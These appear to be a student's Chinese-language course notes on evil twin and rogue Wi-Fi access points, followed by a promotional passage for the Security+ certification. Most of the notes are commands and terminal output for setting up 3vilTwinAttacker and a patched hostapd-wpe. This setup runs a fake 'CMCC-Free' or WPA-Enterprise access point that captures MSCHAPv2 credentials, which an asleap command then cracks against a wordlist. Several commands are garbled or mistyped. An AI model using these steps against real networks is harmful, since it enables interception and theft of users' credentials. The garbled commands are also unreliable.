【安全牛学习笔记】EVIL TWIN AP、ROGUE AP

来源:互联网 发布:什么是php网站 编辑:程序博客网 时间:2024/06/05 10:02

EVIL TWIN AP / ROGUE AP                                      
3vilTwinAttacker                                              
    git clone https://github.com/P0cL4bs/3vilTwinAttacker.git
    cd 3vilTwinAttacker                                       
    chmod +x installer.sh                                     
    ./installer.sh --install                                  
                                                                                                           

iptables 

root@kali:~# git clone https://github.com/P0cL4bs/3vilTwinAttacker.git
正克隆到 '3vilTwinAttacker'...
remote: Counting objects: 849, done.
remote: Total 849 (delta 0), reused 0 (delta 0), pack-reused 849
接收对象中: 100% (849/849), 4.33 MiB | 459.00 KiB/s, 完成.
处理 delta 中: 100% (408/408), 完成.
检查连接... 完成。

root@kali:~# ls 3vilTwinAttacker
3vilTwinAttacker    isc-dhcp-server_4.3.1-6_amd64.deb

root@kali:~# cd 3vilTwinAttacker

root@kali:~/3vilTwinAttacker# ls
3vilTwinAttacker    isc-dhcp-server_4.3.1-6_amd64.deb

root@kali:~/3vilTwinAttacker# cd 3vilTwinAttacker

root@kali:~/3vilTwinAttacker/3vilTwinAttacker# cd ..

root@kali:~/3vilTwinAttacker# apt-get install isc-dhcp-server

root@kali:~/3vilTwinAttacker# dpkg -i isc-dhcp-server_4.3.1-6_amd64.deb
Selecting previously unselected package isc-dhcp-server.
(Reading database ... 85%
Preparing to unpack is dpkg -i isc-dhcp-server_4.3.1-6_amd64.deb ...
Unpacking isc-dhcp-server (4.3.1-6) ...
Setting up isc-dhcp-server (4.3.1-6) ...
Generating /etc/default/isc-dhcp-server (4.3.1-6) ...
update-rc.d: We have no instructions for the isc-dhcp-server init script.
update-rc.d: It looks like a network service, we disable it.
insserv: warning: current start runlevel(s) (empty) of script 'isc-dhcp-server' overrides LSB defaults(2 3 4 5).
insserv: warning: current stop runlevel(s) (0 1 2 3 4 5 6) of script 'isc-dhcp-server' overrides LSB defaults (0 1 6).
Processing triggers for systemd (215-17+deb8ul) ...
Processing triggers for man-db (2.7.0.2-5) ...

root@kali:~/3vilTwinAttacker# cd 3vilTwinAttacker

root@kali:~/3vilTwinAttacker/3vilTwinAttacker# ls
3vilTwinAttacker.py  CONTRIBUTING.md  installer.sh  logs     Plugins    requirements.txt  Settings    update.sh
CHANGELOG            Core             LICENSE       Modules  README.md  rsc               Templates
 
root@kali:~/3vilTwinAttacker/3vilTwinAttacker# ./installer.sh --install

root@kali:~/3vilTwinAttacker-master# ./3vilTwin.py --install
WARNING: No route found for IPv6 destination :: (no default route?)
[+] checking dependencies...
=============================
{+} dhcpd --> [Ok]...       |
{+} airbase-ng --> [Ok]...  |
{+} ettercap --> [Ok]...    |
{+} sslstrip --> [Ok]...    |
{+} Xterm  --> [Ok]...      |
{+} nmap  --> [Ok]...       |
{+} Starting GUI...         |
=============================
[3;J

//3vilTwinAttacker v0.5.3 beta  百度网盘  http://yun.baidu.com/s/1jGDuXc6

Modules----->Settings
iptables:
iptables -P FORWARD ACCEPT
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

hostpad:
###WPA/IEEE 802.11i
wpa=2
wpa_key_mgmt=WPA-PSK
wpa_passphrase=password
wpa_pairwise=CCMP

###hostapd event logger configuration
#logger_syslog=127
#logger_syslog_level=2
#logger_stdout=127
#logger_stdout_level=2

WPA企业                      
hostapd-wpe                   
    取代FreeRADIUS-wpe        
    EAP-FAST/MSCHAPv2(Phase 0)
    PEAP/MSCHAPv2             
    EAP-TTLS/MSCHAPv2         
    EAP-TTLS/MSCHAPv2         
    EAP-TTLS/MSCHAP           
    EAP-TTLS/CHAP             
    EAP-TTLS/PAP  

Gateway:192.168.1.1
AP Name:CMCC-Free
Channel:11
Network Adapter:waln2

root@kali:~# git clone https://github.com/OpenSecurityRessarch/hostapd-wpe

root@kali:~# apt-get install libssl-dev

root@kali:~# wget http://ftp.debian.org/debian/pool/main/libn/libnl/libnl-dev 1.1-7 amd64.deb

root@kali:~# wget http://ftp.debian.org/debian/pool/main/libn/libnl/libnl1 1.1-7 amd64.denb

root@kali:~# dpkg -i libnl1_1.1_7_amd64.deb

root@kali:~# dpkg -i libnl-dev1_1.1_7_amd64.deb

WPA企业                                                  
wget http://hostap.epitest.fi/releases/hostapd-2.2.tar.gz
tar -zxf hostapd-2.2.tar.gz                              
cd hostapd-2.2                                           
patch -p 1 < ../hostapd-wpe/hostapd-wpe.patch            
cd hostapd                                               
make    

root@kali:~# wget http://hostap.epitest.fi/releases/hostapd-2.2.tar.gz

root@kali:~# tar -zxf hostapd-2.2.tar.gz

root@kali:~# cd hostapd-2.2

root@kali:~/hostapd-2.2# patch -p 1 < ../hostapd-wpe/hostapd-wpe.patch

root@kali:~/hostapd-2.2# cd hostapd

root@kali:~/hostapd# make

WPA企业                          
生成证书                          
    cd ../../hostapd-wpe/certs    
    ./bootstrap                  
service network-manager stop     
airmon-ng check kill             
映射无线网卡                     
ifconfig wlan2 up                
启动伪造AP                        
    cd ../../hostapd-2.2/hostapd  
    ./hostapd-wpe hostapd-wpe.conf

# Interface - Probably wlan0 for 802.11, eth0 for wired interface=wlan2

# Driver - comment this out if 802.11
#dirver=wired
dirver=nl80211

# May have to change these depending on build location
eap_user_file=hostapd-wpe.eap_user
ca_cert=../../hostapd-wpe/certs/ca/pem
server_cert=../../hostapd-wpe/certs/server.pem
private_key=../../hostapd-wpe/certs/server.pem
private_key_passwd=whatever
dh_file=../../hostapd-wpe/certs/dh

# 802.11 Options - Uncomment all if 802.11
ssid=kifi
hw_mode=g
channel=11

root@kali:~/hostapd-2.2# cd ../../hostapd-wpe/certs

root@kali:~/hostapd-2.2# ./bootstrap

root@kali:~/hostapd-2.2# service network-manager stop

root@kali:~/hostapd-2.2# airmon-ng check kill

root@kali:~/hostapd-2.2# ifconfig wlan2 up

root@kali:~/hostapd-2.2# cd ../../hostapd-2.2/hostapd

root@kali:~/hostapd-2.2# ./hostapd-wpe hostapd-wpe.conf
Configuration file: hostapd-wpe.conf
Using interface wlan2 with hwaddr 08:57:00:0c:96:68 and ssid "kifi"
wlan2: interface state UNINIIALIZED->ENABLED
wlan2: AP-ENABLED

root@kali:~# asleap -C 1c:27:22:95:77:fb:ab:3e -R fb:65:e5:66:f2:4d:12:07:6d:5e:6f:b0:6c:c5:16:cf:d5:bb:16:91:47:5d:11:20 -W /usr/share/john/password.lst

该笔记为安全牛课堂学员笔记,想看此课程或者信息安全类干货可以移步到安全牛课堂

Security+认证为什么是互联网+时代最火爆的认证?


      牛妹先给大家介绍一下Security+


        Security+ 认证是一种中立第三方认证,其发证机构为美国计算机行业协会CompTIA ;是和CISSP、ITIL 等共同包含在内的国际 IT 业 10 大热门认证之一,和CISSP偏重信息安全管理相比,Security+ 认证更偏重信息安全技术和操作。

       通过该认证证明了您具备网络安全,合规性和操作安全,威胁和漏洞,应用程序、数据和主机安全,访问控制和身份管理以及加密技术等方面的能力。因其考试难度不易,含金量较高,目前已被全球企业和安全专业人士所普遍采纳。

Security+认证如此火爆的原因?  

       原因一:在所有信息安全认证当中,偏重信息安全技术的认证是空白的, Security+认证正好可以弥补信息安全技术领域的空白 。

      目前行业内受认可的信息安全认证主要有CISP和CISSP,但是无论CISP还是CISSP都是偏重信息安全管理的,技术知识讲的宽泛且浅显,考试都是一带而过。而且CISSP要求持证人员的信息安全工作经验都要5年以上,CISP也要求大专学历4年以上工作经验,这些要求无疑把有能力且上进的年轻人的持证之路堵住。在现实社会中,无论是找工作还是升职加薪,或是投标时候报人员,认证都是必不可少的,这给年轻人带来了很多不公平。而Security+的出现可以扫清这些年轻人职业发展中的障碍,由于Security+偏重信息安全技术,所以对工作经验没有特别的要求。只要你有IT相关背景,追求进步就可以学习和考试。

       原因二: IT运维人员工作与翻身的利器。

       在银行、证券、保险、信息通讯等行业,IT运维人员非常多,IT运维涉及的工作面也非常广。是一个集网络、系统、安全、应用架构、存储为一体的综合性技术岗。虽然没有程序猿们“生当做光棍,死亦写代码”的悲壮,但也有着“锄禾日当午,不如运维苦“的感慨。天天对着电脑和机器,时间长了难免有对于职业发展的迷茫和困惑。Security+国际认证的出现可以让有追求的IT运维人员学习网络安全知识,掌握网络安全实践。职业发展朝着网络安全的方向发展,解决国内信息安全人才的匮乏问题。另外,即使不转型,要做好运维工作,学习安全知识取得安全认证也是必不可少的。

        原因三:接地气、国际范儿、考试方便、费用适中!

CompTIA作为全球ICT领域最具影响力的全球领先机构,在信息安全人才认证方面是专业、公平、公正的。Security+认证偏重操作且和一线工程师的日常工作息息相关。适合银行、证券、保险、互联网公司等IT相关人员学习。作为国际认证在全球147个国家受到广泛的认可。

        在目前的信息安全大潮之下,人才是信息安全发展的关键。而目前国内的信息安全人才是非常匮乏的,相信Security+认证一定会成为最火爆的信息安全认证。